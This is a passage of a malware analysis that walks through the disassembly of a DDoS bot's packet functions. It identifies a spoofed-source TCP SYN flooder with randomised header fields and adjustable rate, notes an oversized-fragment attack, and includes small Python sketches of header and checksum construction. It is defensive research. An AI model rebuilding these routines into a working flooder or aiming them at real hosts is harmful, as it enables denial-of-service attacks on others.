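# Where the fragment's data would end if the length field were honoured.
claimed_end = offset_bytes + (CLAIMED_TOTAL_LENGTH - IP_HEADER_LEN)

print(flags, offset_bytes, claimed_end, claimed_end > 65535)
```

Taken at face value, the fragment claims to carry data ending beyond
the 65535 byte maximum size of an IP datagram.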
Features of this attack:
* Single victim
* Victim may be hostname-based
* Hostname can be re-looked up every 80000 packets(2.2MB)!
* Packet stream should be constant(except during dns lookups)
* Content can be UDP or ICMP
* Packets should be errors.
f) Network_Function_D [0x8049d40] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
*0xfffff00e(%ebp), 0xffffbb44(%ebp))
Guesses at purpose:
Possibly another packetting function like network functions B and C
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH,
LongI, LongJ, LongK, LongL, LongM, BufferA)
Disassembly:
This function starts off just like the previous, with copying of
function parameters into local variables. One of the first things of
interest to occur:
0x8049d94: cmpl $0x0,0x34(%ebp)
0x8049d98: je 0x8049d9d
0x8049d9a: decl 0x34(%ebp)
0x34(%ebp) is LongL. If it is non-zero, it is decremented.
This is followed by:
0x8049d9d: pushl $0x0
0x8049d9f: call 0x8057444
Which matches to a time(0) call, the result of which:
0x8049da7: pushl %eax
0x8049da8: call 0x80559a0
Is passed to an srandom() call.
0x8049db0: movw $0x2,0xfffffff0(%ebp)
0x8049db6: call 0x8055e38
2 is put into a variable, and is followed by a call to random(). The
result goes through the now expected MOD routine, this time by 255, and
the outcome is xchg'd (byte-swapped) then placed into 0xfffffff2(%ebp).
0x8049dcb: cmpl $0x0,0x38(%ebp)
0x8049dcf: jne 0x8049e0b
0x38(%ebp) matches up with LongM. If LongM is 0:
0x8049dd1: movzbl 0xffffff38(%ebp),%eax
0x8049dd8: pushl %eax
0x8049dd9: movzbl 0xffffff54(%ebp),%eax
0x8049de0: pushl %eax
0x8049de1: movzbl 0xffffff58(%ebp),%eax
0x8049de8: pushl %eax
0x8049de9: movzbl 0xffffff5c(%ebp),%eax
0x8049df0: pushl %eax
0x8049df1: pushl $0x806768a
0x8049df6: leal 0xffffff88(%ebp),%ebx
0x8049df9: pushl %ebx
0x8049dfa: call 0x804f808
This is an sprintf call, and one that has been seen before. The pushl's
all correspond to the localised versions of the function parameters. It
effectively attempts to form a dotted quad address at 0xffffff88(%ebp)
using LongA, LongB, LongC, and LongD as the octets. With this:
0x8049dff: pushl %ebx
0x8049e00: call 0x804ce8c
0x8049e05: movl %eax,0xfffffff4(%ebp)
inet_addr() is called and the result placed into 0xfffffff4(%ebp).
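The sprintf()/inet_addr() pair can be sketched in Python. The format
string "%d.%d.%d.%d" is an assumption (the bytes at 0x806768a are not
dumped here), octets_to_addr is a made-up helper name, and the octets
are sample values only.

```python
import socket
import struct

def octets_to_addr(a, b, c, d):
    """Build a dotted quad string, then convert it as inet_addr() would."""
    # movzbl keeps only the low byte of each localised parameter.
    # The format string is assumed; the real one lives at 0x806768a.
    dotted = "%d.%d.%d.%d" % (a & 0xFF, b & 0xFF, c & 0xFF, d & 0xFF)
    # inet_aton() returns the 4 address bytes in network byte order.
    packed = socket.inet_aton(dotted)
    # Read as a little-endian long, this is the value a movl of the
    # inet_addr() result would carry in %eax on x86.
    as_x86_long = struct.unpack("<I", packed)[0]
    return dotted, packed, as_x86_long

dotted, packed, value = octets_to_addr(192, 168, 1, 10)
print(dotted, packed.hex(), hex(value))
```

The point of interest is that the long in %eax looks "backwards"
compared to the dotted quad, while the bytes in memory are already in
the order the packet needs.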
0x8049e0b: movb $0x45,0xffffffc8(%ebp)
0x8049e0f: movw $0x2800,0xffffffca(%ebp)
0x8049e15: movb $0x0,0xffffffc9(%ebp)
Once again, the well-known 0x45. Assuming this corresponds to the ihl
and version of an IP header, the packet buffer would start at
0xffffffc8(%ebp). As such, 0xffffffca(%ebp) should be the length field
of the IP header (in network byte order). 0xffffffc9(%ebp) would be the
TOS field.
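As a quick check of the byte order reasoning, here is a small Python
sketch of what those two stores leave in memory. Nothing here comes
from the binary beyond the two constants.

```python
import struct

# movw $0x2800 stores the word little-endian, so memory holds 0x00 0x28.
stored = struct.pack("<H", 0x2800)
# Read back in network (big-endian) order this is the IP total length.
total_length = struct.unpack("!H", stored)[0]

# 0x45 splits into version (high nibble) and header length in 32-bit words.
version = 0x45 >> 4
ihl_bytes = (0x45 & 0x0F) * 4

print(version, ihl_bytes, total_length)
```

So the header claims IPv4, a 20 byte IP header, and a 40 byte packet in
total, which leaves room for exactly 20 more bytes after the IP header.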
A function is setup and called:
0x8049e19: pushl $0xff
0x8049e1e: pushl $0x3
0x8049e20: pushl $0x2
0x8049e22: call 0x8056cf4
A simple socket() call, no different to what was seen in earlier
functions:
socket(AF_INET, SOCK_RAW, IPPROTO_RAW)
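The mapping from the pushed values to the constant names can be checked
against Python's socket module. This is only a sanity check of the
numbers, no socket is opened (a raw socket would need root anyway).

```python
import socket

# Values pushed (right to left) before the call to 0x8056cf4.
pushed = {"domain": 0x2, "type": 0x3, "protocol": 0xFF}

names = {
    "domain": socket.AF_INET,
    "type": socket.SOCK_RAW,
    "protocol": socket.IPPROTO_RAW,
}
# Compare each pushed value with the numeric value of the named constant.
matches = {key: int(names[key]) == value for key, value in pushed.items()}
print(matches)
```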
Socket descriptor is placed into a variable:
0x8049e27: movl %eax,0xffffff40(%ebp)
0x8049e30: testl %eax,%eax
0x8049e32: jle 0x804a178
And is then checked to ensure it is greater than 0. If so:
0x8049e38: cmpl $0x0,0x20(%ebp)
0x8049e3c: je 0x8049e72
0x20(%ebp) is checked. This corresponds to LongG. If it is non-zero:
0x8049e3e: movzbl 0xffffff44(%ebp),%eax
0x8049e45: pushl %eax
0x8049e46: movzbl 0xffffff48(%ebp),%eax
0x8049e4d: pushl %eax
0x8049e4e: movzbl 0xffffff4c(%ebp),%eax
0x8049e55: pushl %eax
0x8049e56: movzbl 0xffffff50(%ebp),%eax
0x8049e5d: pushl %eax
0x8049e5e: pushl $0x806768a
0x8049e63: leal 0xffffff68(%ebp),%eax
0x8049e69: pushl %eax
0x8049e6a: call 0x804f808
An sprintf is setup and called, once again to form a dotted quad using
parameters passed to the function (LongH,LongI,LongJ,LongK).
0x8049e72: cmpl $0x0,0x38(%ebp)
0x8049e76: jne 0x8049e87
LongM is checked, and if it is 0:
0x8049e78: leal 0xffffff88(%ebp),%eax
0x8049e7b: pushl %eax
0x8049e7c: call 0x804ce8c
0x8049e81: movl %eax,0xffffffd8(%ebp)
The string at 0xffffff88(%ebp) is passed to inet_addr(). This was set
up earlier by the first sprintf() to be a dotted quad of LongA-D.
The result of the inet_addr() is placed into 0xffffffd8(%ebp), which
should correspond to a destination IP of the packet buffer that appears
to be under construction.
Some more packet buffer setup:
0x8049e87: movw $0x0,0xffffffce(%ebp)
0x8049e8d: movb $0x6,0xffffffd1(%ebp)
The 0 is placed into the IP offset field.
The 6 is placed into the IP protocol field, indicating a TCP packet.
Assuming a 20 byte IP header as indicated by the ihl, the TCP packet
buffer should start at 0xffffffdc(%ebp).
0x8049e91: movb 0xffffffe9(%ebp),%al
0x8049e94: andb $0xef,%al
0x8049e96: movb %al,0xffffffe9(%ebp)
0x8049e99: movb 0xffffffe8(%ebp),%al
0x8049e9c: andb $0xf,%al
0x8049e9e: orb $0x50,%al
0x8049ea0: movb %al,0xffffffe8(%ebp)
These lines perform logical operations on two bytes. The byte at
0xffffffe9(%ebp) is ANDed with 0xef, and the byte at 0xffffffe8(%ebp)
has its low nibble kept (AND 0xf) and its high nibble set to 5 (OR
0x50). 0xffffffe9(%ebp) should correspond to the TCP flags, and
0xffffffe8(%ebp) to the data offset byte just before them. This seems
extremely strange since the values at the two bytes involved do not seem
to be set previously.
0x8049ea3: movl $0x0,0xffffffe4(%ebp)
0x8049eaa: andb $0x50,%al
0x8049eac: movb %al,0xffffffe8(%ebp)
This results in the acknowledgement number being set to 0. %al still
holds the value just written to 0xffffffe8(%ebp), that is (x AND 0xf) OR
0x50, so the AND with 0x50 leaves exactly 0x50 whatever x was. The
repeated setting of 0xffffffe8(%ebp) is still extremely strange.
0x8049eaf: movb $0x2,0xffffffe9(%ebp)
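0xffffffe9(%ebp) earlier took part in the strange activity above, yet is
now set to a constant of 2. It seems strange that a C compiler would
have done the earlier code, possibly indicating a buggy compiler, or a
buggy programmer with buggy asm. Another possibility is a compiler
updating C bitfields one member at a time, which would read and rewrite
the same byte like this.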
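To see whether the unset starting bytes matter, the byte operations from
0x8049e91 to 0x8049eaf can be replayed in Python for every possible
starting value. The sketch assumes %al is not touched between 0x8049ea0
and 0x8049eaa (the movl of 0 to memory in between does not use it).
header_bytes_after is a made-up name.

```python
def header_bytes_after(initial_e8, initial_e9):
    """Replay the byte operations on 0xffffffe8 and 0xffffffe9(%ebp)."""
    e9 = initial_e9 & 0xEF            # andb $0xef: clears bit 0x10 (ACK)
    al = (initial_e8 & 0x0F) | 0x50   # andb $0xf ; orb $0x50
    e8 = al                           # first store to 0xffffffe8(%ebp)
    al &= 0x50                        # andb $0x50 on the value still in %al
    e8 = al                           # second store to 0xffffffe8(%ebp)
    e9 = 0x02                         # movb $0x2: overwrites the flags byte
    return e8, e9

# Try every starting value for the data offset byte, and two extremes
# for the flags byte.
results = {header_bytes_after(x, y) for x in range(256) for y in (0x00, 0xFF)}
print(results)
```

Only one outcome is possible: 0x50 in the data offset byte and 0x02 in
the flags byte, so the garbage read at the start never reaches the wire.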
0x8049eb3: movw $0x0,0xffffffee(%ebp)
The 0 is placed into what looks to be the urgent data pointer in the tcp
header.
0x8049eb9: movl 0x18(%ebp),%eax
0x8049ebc: shll $0x8,%eax
0x8049ebf: addw 0x1c(%ebp),%ax
0x8049ec3: xchgb %al,%ah
0x8049ec5: movw %ax,0xffffffde(%ebp)
LongE and LongF seem to work together to form the tcp destination port.
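The shll/addw/xchgb sequence can be mirrored in Python to show how the
two parameters end up as a port on the wire. port_bytes is a made-up
name and the sample values (0x1f, 0x90) are only for illustration.

```python
import struct

def port_bytes(high, low):
    """Mirror shll $8 / addw / xchgb / movw for the TCP destination port."""
    ax = ((high << 8) + low) & 0xFFFF          # shll $0x8,%eax ; addw ...,%ax
    swapped = ((ax & 0xFF) << 8) | (ax >> 8)   # xchgb %al,%ah
    return struct.pack("<H", swapped)          # movw stores little-endian

wire = port_bytes(0x1F, 0x90)
print(wire.hex(), struct.unpack("!H", wire)[0])
```

LongE supplies the high byte and LongF the low byte, so 0x1f and 0x90
come out as port 0x1f90 (8080) in network byte order.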
0x8049ecb: movb $0x0,0xffffffb0(%ebp)
0x8049ecf: cmpl $0x0,0x38(%ebp)
0x8049ed3: jne 0x8049edb
It is unclear what 0xffffffb0(%ebp) is used for at this point.
0x38(%ebp) once again, still refers to LongM. If it is 0:
0x8049ed5: movl 0xffffffd8(%ebp),%eax
0x8049ed8: movl %eax,0xffffffac(%ebp)
0xffffffd8(%ebp) contains the destination IP that was set in the packet
buffer earlier.
Continuing:
0x8049edb: movb $0x6,0xffffffb1(%ebp)
0x8049edf: movw $0x1400,0xffffffb2(%ebp)
0x8049ee7: leal 0xffffffa8(%ebp),%ebx
0x8049eea: movl %ebx,0xffffff3c(%ebp)
0x8049ef0: movl $0x0,0xffffff34(%ebp)
0x8049efa: cmpl $0x0,0x38(%ebp)
0x8049efe: je 0x8049f5b
A lot of unknowns, until LongM is checked. If it is non-zero:
0x8049f00: testl %esi,%esi
0x8049f02: jg 0x8049f5b
%esi is used as a counter in this function (will be seen soon). If this
counter reaches 0 (it is initially 0 too):
0x8049f04: movl 0x3c(%ebp),%ebx
0x8049f07: pushl %ebx
0x8049f08: call 0x804bf80
0x8049f0d: movl %eax,%edx
0x8049f12: testl %edx,%edx
0x8049f14: jne 0x8049f30
0x3c(%ebp) is BufferA, and is passed to the gethostbyname() function, as
has been seen in previous functions. The return is then checked to
ensure it didn't fail. If it did fail:
0x8049f16: pushl $0x258
0x8049f1b: call 0x80556cc
0x8049f20: movl $0x1,0xffffff34(%ebp)
0x8049f2d: jmp 0x8049f5b
We sleep(600), set 0xffffff34(%ebp) to 1, and jump.
If the gethostbyname is successful, Misc_Data_Copy is called to copy the
first IP address for the hostname to 0xffffff64(%ebp).
The same address is then copied to three more locations:
0x8049f44: movl 0xffffff64(%ebp),%eax
0x8049f4a: movl %eax,0xffffffd8(%ebp)
0x8049f4d: movl %eax,0xfffffff4(%ebp)
0x8049f50: movl %eax,0xffffffac(%ebp)
0xffffffd8(%ebp) is the packet destination address. 0xfffffff4(%ebp) is
unknown, and 0xffffffac(%ebp) has just become known. 0xffffffac(%ebp)
puts in another piece to solve a puzzle of the data starting at
0xffffffa8(%ebp). A lot of copies were unknown earlier but become clear
when it is realised that 0xffffffa8(%ebp) marks the start of a commonly
used 'pseudo' header. Earlier, values matching a protocol, tcp_length,
and destination address (if hostname wasn't used) were placed in this
location. It is not proven beyond doubt that this memory location is
indeed a pseudo header (used for generating the tcp checksum), but it
should definitely be looked out for when the checksumming functions
occur.
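For reference, this is what a standard TCP pseudo header would look like
if the guess is right, with the suspected stack locations as comments.
The source slot at 0xffffffa8(%ebp) is an assumption at this point in
the analysis, and the addresses are sample values.

```python
import socket
import struct

def tcp_pseudo_header(src, dst, tcp_length=20):
    """12 byte pseudo header: source, destination, zero, protocol, length."""
    return struct.pack(
        "!4s4sBBH",
        socket.inet_aton(src),   # 0xffffffa8(%ebp), assumed source slot
        socket.inet_aton(dst),   # 0xffffffac(%ebp)
        0,                       # 0xffffffb0(%ebp)
        6,                       # 0xffffffb1(%ebp), the TCP protocol number
        tcp_length,              # 0xffffffb2(%ebp), stored as movw $0x1400
    )

pseudo = tcp_pseudo_header("10.0.0.1", "10.0.0.2")
print(len(pseudo), pseudo.hex())
```

The last two bytes match what movw $0x1400 leaves in memory (0x00 0x14),
which is a TCP length of 20 in network byte order.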
0x8049f53: movl $0x9c40,%esi
%esi is the counter spoken of earlier. This is the point that sets the
counter, indicating that a hostname has just been resolved.
0x8049f5b: cmpl $0x0,0xffffff34(%ebp)
0x8049f62: jne 0x8049ef0
0xffffff34(%ebp) appears to be used as an indicator that gethostbyname()
failed (if it was called). It was earlier set to 0, and should remain 0
unless gethostbyname was called and failed. As such, if it is 0:
0x8049f64: call 0x8056058
This is a random() call, and is followed by MOD 0xc11 code. Following
this:
0x8049f73: addb $0x2,%ah
0x8049f76: xchgb %al,%ah
0x8049f78: movw %ax,0xffffffcc(%ebp)
512 is added to %ax (0x2 into %ah), and %al and %ah are exchanged
(htons()'d). The result is placed into 0xffffffcc(%ebp) which should be
the IP header ID field. With a MOD 0xc11 result of 0 to 3088, this
field ends up between 512 and 3600.
The same process is done again, this time with a MOD 0x579, addw 0xc8.
The value is inserted into the packet buffer:
0x8049f91: movw %ax,0xffffffea(%ebp)
This matches up with the tcp window. 0x579 is 1401, so the MOD result is
0 to 1400 and the window ends up between 200 and 1600.
Yet again, the same process is followed, this time with a MOD 0x9c40,
incw %ax. The data is placed:
0x8049fa8: movw %ax,0xffffffdc(%ebp)
0xffffffdc(%ebp) corresponds to the TCP header's source port, making it
between 1 and 40000.
Still the same process, with a MOD 0x2625a00, leal 0x1(%edx) this time.
This is placed into 0xffffffe0(%ebp), the sequence number. The MOD and
leal 0x1, will result in the sequence number being between 1 and
0x2625a00.
And finally, once more we obtain a random number, MOD by 0x74, and add
0x7d. The result is placed into 0xffffffd0(%ebp) which is the IP
packet's TTL field, making it random between 125 and 240.
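The ranges follow directly from each modulus and added constant, so they
can be worked out mechanically. A small Python sketch, assuming random()
returns a non-negative value (so r MOD m is 0 to m-1); the field names
are just labels.

```python
# (modulus, added constant) pairs read from the disassembly above.
fields = {
    "ip_id":      (0xC11, 0x200),
    "tcp_window": (0x579, 0xC8),
    "tcp_sport":  (0x9C40, 1),
    "tcp_seq":    (0x2625A00, 1),
    "ip_ttl":     (0x74, 0x7D),
}

# Lowest value is the added constant, highest is (modulus - 1) plus it.
ranges = {name: (add, (mod - 1) + add) for name, (mod, add) in fields.items()}
for name, (low, high) in ranges.items():
    print(name, low, high)
```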
Continuing:
0x8049fd9: cmpl $0x0,0x20(%ebp)
0x8049fdd: jne 0x804a01c
0x20(%ebp) is LongG. If this is 0, a long process is undertaken which
leads to a result of a dotted quad string located at 0xffffff68(%ebp),
made up of random octets (excluding 255 for each).
Regardless of LongG, we continue:
0x804a01c: leal 0xffffff68(%ebp),%eax
0x804a022: pushl %eax
0x804a023: call 0x804ce8c
0x804a028: movl %eax,0xffffffd4(%ebp)
0x804a02b: movl %eax,0xffffffa8(%ebp)
This passes the dotted quad (random, or built from LongH-K) through
inet_addr and places the result in two places, the IP header source
address, and the believed pseudo IP source address.
More setup:
0x804a02e: movw $0x0,0xffffffec(%ebp)
0x804a034: movw $0x0,0xffffffd2(%ebp)
0xffffffec(%ebp), the TCP checksum is set to 0.
0xffffffd2(%ebp), the IP checksum is set to 0.
0x804a03a: pushl $0x14
0x804a03c: leal 0xffffffb4(%ebp),%eax
0x804a03f: pushl %eax
0x804a040: leal 0xffffffdc(%ebp),%eax
0x804a043: pushl %eax
0x804a044: call 0x8056480
Misc_Data_Copy is called upon to copy 20 bytes from 0xffffffdc(%ebp) to
0xffffffb4(%ebp). We know that 0xffffffdc(%ebp) is the start of the TCP
header. We do not know at this time what the size of the TCP header
will be, but we assume 20 bytes. This 20 byte TCP header is copied to
what would be the tcp header duplicate in the pseudo header (12 byte
offset from 0xffffffa8(%ebp)).
What is believed to be checksum code is started. What we look for is
either 0xffffffa8(%ebp), or 0xffffffc8(%ebp) being used since these are
the beginnings of the pseudo and ip headers.
In looking over the code, %edx is used as a size field. It is initially
set like this:
0x804a04c: movl $0x20,%edx
Which seems to make the loop initially cover 0x20 bytes (while
incrementing the 'checksum' by the value of each byte). The fact that
this would appear to be calculating the checksum of 32 bytes (12 byte
pseudo header plus 20 byte TCP header) gives it away as being the pseudo
header checksum. Indeed, eventually:
0x804a0b5: movw %ax,0xffffffec(%ebp)
This location directly corresponds to 16 bytes into the TCP header,
confirming it is indeed the tcp checksum(calculated from the pseudo
header).
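For comparison, here is the usual Internet checksum run over a 12 byte
pseudo header followed by a 20 byte TCP header. This is the textbook
16-bit one's complement sum, not a transcription of the loop in the
binary, and all header values are sample data.

```python
import struct

def internet_checksum(data):
    """One's complement sum of 16-bit big-endian words, then inverted."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd lengths with a zero
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

# Sample 12 byte pseudo header and 20 byte TCP header (checksum field zero).
pseudo = bytes.fromhex("0a0000010a00000200060014")
tcp = struct.pack("!HHIIBBHHH", 1234, 80, 1, 0, 0x50, 0x02, 512, 0, 0)
csum = internet_checksum(pseudo + tcp)

# Writing the result 16 bytes into the TCP header makes the block verify.
filled = tcp[:16] + struct.pack("!H", csum) + tcp[18:]
print(len(pseudo + tcp), hex(csum), internet_checksum(pseudo + filled))
```

The 32 byte input length lines up with the 0x20 loaded into %edx, and a
correctly filled header sums back to 0 when checked the same way.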
Following this checksum, another seems to be done:
0x804a0b9: movl $0x14,%edx
Indicating 20 byte loop, and finally:
0x804a121: movw %ax,0xffffffd2(%ebp)
Placing the result checksum into 0xffffffd2(%ebp), the IP checksum.
We then setup for a call:
0x804a125: pushl $0x10
0x804a127: leal 0xfffffff0(%ebp),%eax
0x804a12a: pushl %eax
0x804a12b: pushl $0x0
0x804a12d: pushl $0x28
0x804a12f: leal 0xffffffc8(%ebp),%eax
0x804a132: pushl %eax
0x804a133: movl 0xffffff40(%ebp),%ebx
0x804a139: pushl %ebx
0x804a13a: call 0x8056c3c
This call is sendto(). The first parameter is 0xffffff40(%ebp) as
expected (the socket returned by socket() earlier). 0xffffffc8(%ebp) is
the buffer address to be sent, which does match up to the 'packet
buffer' that has been constructed all this time. The amount of data to
be sent is 0x28 (40 bytes), and 0xfffffff0(%ebp) does match up to an
AF_INET sockaddr structure that was defined very early in the function.
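The 0x10 pushed as the last argument fits the size of a sockaddr_in. A
Python sketch of that 16 byte layout, with the stack locations from
this function as comments. The helper name and the address are made up
for illustration.

```python
import socket
import struct

def sockaddr_in(port_field, addr):
    """Pack a 16 byte sockaddr_in: family, port, address, padding."""
    return (
        struct.pack("<H", socket.AF_INET)   # movw $0x2,0xfffffff0(%ebp)
        + struct.pack("!H", port_field)     # 0xfffffff2(%ebp)
        + socket.inet_aton(addr)            # 0xfffffff4(%ebp)
        + b"\x00" * 8                       # sin_zero padding
    )

sa = sockaddr_in(0, "10.0.0.2")
print(len(sa) == 0x10, sa.hex())
```

This would also explain the earlier inet_addr() result stored at
0xfffffff4(%ebp): it sits exactly where the address member belongs.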
The sendto() is followed by:
0x804a142: cmpl $0x0,0x34(%ebp)
0x804a146: jne 0x804a154
This checks LongL. If it is 0:
0x804a148: pushl $0x12c
0x804a14d: call 0x80555b0
0x804a152: jmp 0x804a165
It will call a usleep(0x12c). If LongL is not 0:
0x804a154: cmpl %edi,0x34(%ebp)
0x804a157: jne 0x804a170
0x804a159: pushl $0x12c
0x804a15e: call 0x80555b0
0x804a163: xorl %edi,%edi
It will compare %edi, which appears to take on a role of a counter, to
LongL. If the two are equal, a usleep(0x12c) is called, and the counter
is reset.
0x804a165: decl %esi
0x804a169: jmp 0x8049ef0
%esi (used as a hostname re-resolve counter) is also decremented before
it jumps back up into the loop.
0x804a170: incl %edi
0x804a171: jmp 0x8049ef0
If %edi is not equal to LongL, it will increment it and jump back into
the loop.
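The pacing logic is easier to follow as a small simulation. This Python
sketch only models the counters around the sendto(); it assumes %edi
starts at 0, starts %esi at 0x9c40 as if a lookup had just succeeded,
and ignores the re-resolve that happens when %esi runs out.

```python
def simulate(long_l, packets):
    """Count usleep() calls for a given LongL over a number of packets."""
    if long_l != 0:
        long_l -= 1                 # decl 0x34(%ebp) at 0x8049d9a
    edi = 0                         # packets since the last usleep()
    esi = 0x9C40                    # hostname re-resolve counter
    sleeps = 0
    for _ in range(packets):
        # ... the packet is built and sent here ...
        if long_l == 0:
            sleeps += 1             # usleep(0x12c) at 0x804a14d
            esi -= 1                # decl %esi
        elif edi == long_l:
            sleeps += 1             # usleep(0x12c) at 0x804a15e
            edi = 0                 # xorl %edi,%edi
            esi -= 1                # decl %esi
        else:
            edi += 1                # incl %edi, no sleep, %esi untouched
    return sleeps, esi

print(simulate(0, 1000), simulate(10, 1000))
```

In this model a LongL of 0 or 1 sleeps after every packet, while a LongL
of 10 sleeps once per 10 packets. %esi only drops when a usleep()
happens, so the re-resolve interval stretches with LongL.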
Disassembly Review:
Another complex function, with a lot of duplicate code from the other
network functions. Once again, the sprintf(X, "X.X.X.X",A,B,C,D) is
used in conjunction with inet_addr to obtain long based IP addresses.
A buffer seems to be used, dedicated to setting up a TCP packet.
The fields of this buffer are filled in. If LongG is 0, the source IP
is random (without any 255 octets), else the octets are set to the
values contained in LongH, LongI, LongJ, and LongK.
The tcp destination port seems to be set by LongE and LongF.
LongL looks to be able to control the packets per second by using it as
a comparison to a counter (%edi) to determine when a usleep() is called.
If LongM is 0, the destination IP octets for the packets is set by
LongA, LongB, LongC, and LongD. If LongM is not 0, the hostname in
BufferA is looked up using gethostbyname(), and the first IP for it is
used as the destination IP. This hostname is periodically resolved, the
exact time between resolutions is unknown and will have to be determined
during run-time testing.
The flags of the TCP packet do some strange actions to get them to a
stable point. It would appear that the compiler (or author) did some
strange actions upon them (some of which are voided).
In analysing sections of the code, the bigger picture is lost. The
outcome of the tcp flag section appears to be that 0xffffffe9(%ebp) is
set straight out to be 0x2 (overruling the previous unreliable andb
action). 0xffffffe8(%ebp) ends up being set to %al, which is its own
previous value ANDB 0xf, ORB 0x50, ANDB 0x50. The result of these
operations will obviously leave 0xffffffe8(%ebp) at 0x50; it is just
noteworthy to see the incredibly strange read of an unset byte.
The outcome of these operations will leave the TCP doff field set to 5
(indicating a 20 byte tcp header), and all other flags 0 except SYN.
Function Overview:
Yet another 'packetting' function. This time an obvious SYN flooder.
The attack is made rather potent by the randomising of many of the
fields such as the TTL. The source address seems spoofable to
completely random IP's, or a single IP. The destination port is
settable to a unique port, while the source ports are always random.
The only comfort a victim to this attack can take is that any ingress
filtering done on obviously spoofed IP's should block a small amount of
the attack.
The amount of traffic generated by this function is variable by the
blackhat. The amount is dependent upon LongL, however exact
packet-per-second analysis versus this value will have to be done at
runtime.
Features of this attack:
* TCP SYN flood.
* Single victim.
* Victim may be hostname-based.
* Hostname can be re-looked up every X packets!
* Completely random, or a single IP spoofed as source.
* Attack speed is adjustable.
The network traffic generated by this function will be examined in
more detail in Network_Analysis_E.
g) Network_Function_E [0x8049564] - (Network)
Known Usage:
function(*0xfffff002(%ebp), *0xfffff003(%ebp), *0xfffff004(%ebp),
*0xfffff005(%ebp), *0xfffff006(%ebp), *0xfffff007(%ebp),
*0xfffff008(%ebp), *0xfffff009(%ebp), *0xfffff00a(%ebp),
*0xfffff00b(%ebp), *0xfffff00c(%ebp), *0xfffff00d(%ebp),
0xffffbb44(%ebp))
Guesses at purpose:
Once again, believed to be a 'packetting' function due to similar
parameters and positioning.
Naming Conventions:
Parameters will be given the following names:
function(LongA, LongB, LongC, LongD, LongE, LongF, LongG, LongH,
LongI, LongJ, LongK, LongL, BufferA)
Disassembly:
Once again, many of the parameters are copied into localised variables.
0x80495b8: leal 0xffffffdc(%ebp),%edi
0x80495bb: movl $0x8067698,%esi
0x80495c0: cld
0x80495c1: movl $0x9,%ecx
0x80495c6: repz movsl %ds:(%esi),%es:(%edi)
This sees to the copying of 9 longs from 0x8067698 to 0xffffffdc(%ebp).
(gdb) x/36b 0x8067698
0x8067698: 0x15 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a0: 0x14 0x00 0x00 0x00 0x15 0x00 0x00 0x00
0x80676a8: 0x15 0x00 0x00 0x00 0x19 0x00 0x00 0x00
0x80676b0: 0x14 0x00 0x00 0x00 0x14 0x00 0x00 0x00
0x80676b8: 0x14 0x00 0x00 0x00
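Decoding the dump as 9 little-endian longs makes the values easier to
read. A short Python sketch using the bytes exactly as gdb printed them:

```python
import struct

# The 36 bytes shown by x/36b 0x8067698.
dump = bytes([
    0x15, 0, 0, 0, 0x15, 0, 0, 0,
    0x14, 0, 0, 0, 0x15, 0, 0, 0,
    0x15, 0, 0, 0, 0x19, 0, 0, 0,
    0x14, 0, 0, 0, 0x14, 0, 0, 0,
    0x14, 0, 0, 0,
])
# x86 stores longs little-endian, so "<9I" reads them as the code would.
lengths = list(struct.unpack("<9I", dump))
print(lengths)
```

This gives 21, 21, 20, 21, 21, 25, 20, 20, 20.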
These longs look remarkably similar to those from Network_Function_B,
and it turns out the same source is used in both functions. Another
data copy follows:
0x80495c8: leal 0xfffffde8(%ebp),%edi
0x80495ce: movl $0x80676bc,%esi
0x80495d3: cld
0x80495d4: movl $0x7d,%ecx
0x80495d9: repz movsl %ds:(%esi),%es:(%edi)
This sees to the copy of 500 bytes from 0x80676bc to 0xfffffde8(%ebp).
Once again, 0x80676bc was seen in Network_Function_B.
Some variables are set up:
0x80495db: leal 0xfffff9d8(%ebp),%edi
0x80495e1: leal 0xfffff9ec(%ebp),%ebx
0x80495e7: movl %ebx,0xfffff988(%ebp)
0x80495ed: leal 0xfffff9f4(%ebp),%ebx
0x80495f3: movl %ebx,0xfffff984(%ebp)
0x80495f9: movw $0x2,0xfffffdd8(%ebp)
0x8049602: movw $0x0,0xfffffdda(%ebp)
And now comes the start of the 'real' code:
0x804960b: cmpl $0x0,0x34(%ebp)
0x804960f: jne 0x8049645
0x34(%ebp) is LongL. If it is 0:
0x8049611: movzbl 0xfffff9a0(%ebp),%eax
0x8049618: pushl %eax
0x8049619: movzbl 0xfffff9a4(%ebp),%eax
0x8049620: pushl %eax
0x8049621: movzbl 0xfffff9a8(%ebp),%eax
0x8049628: pushl %eax
0x8049629: movzbl 0xfffff9ac(%ebp),%eax
0x8049630: pushl %eax
0x8049631: pushl $0x806768a
0x8049636: leal 0xfffff9b8(%ebp),%eax
0x804963c: pushl %eax
0x804963d: call 0x804f808
This is an sprintf() call, once again to form a dotted quad from LongA,
LongB, LongC, and LongD at 0xfffff9b8(%ebp).
Another condition is done after the completion of the last. LongI is
checked:
0x8049645: cmpl $0x0,0x28(%ebp)
0x8049649: je 0x804964e
0x804964b: decl 0x28(%ebp)
If it is non-zero, it is decremented.
0x804964e: pushl $0xff
0x8049653: pushl $0x3
0x8049655: pushl $0x2
0x8049657: call 0x8056cf4
0x804965c: movl %eax,0xfffff98c(%ebp)
A socket() call with the same parameters as in previous network
functions. The socket descriptor is stored into 0xfffff98c(%ebp).
0x8049665: testl %eax,%eax
0x8049667: jle 0x80499d8
It is then tested to see if the socket() call was successful. If so,
it continues:
0x804966d: movl $0x0,0xfffff980(%ebp)
0x8049677: movl $0x0,0xfffff97c(%ebp)
0x8049681: pushl $0x400
0x8049686: pushl $0x0
0x8049688: pushl %edi
0x8049689: call 0x8057764
This function is believed to be a memset() and that assumption still
holds true. %edi was earlier set to 0xfffff9d8(%ebp). This call should
result in the 0x400 (1024) bytes starting at 0xfffff9d8(%ebp) being set
to 0.
Continuing:
0x8049694: xorl %esi,%esi
0x8049696: cmpl $0x0,0x34(%ebp)
0x804969a: je 0x80496fc
0x804969c: cmpl $0x0,0xfffff97c(%ebp)
0x80496a3: jg 0x80496fc
%esi is set to 0 (perhaps indicating a loop). Two conditions are then
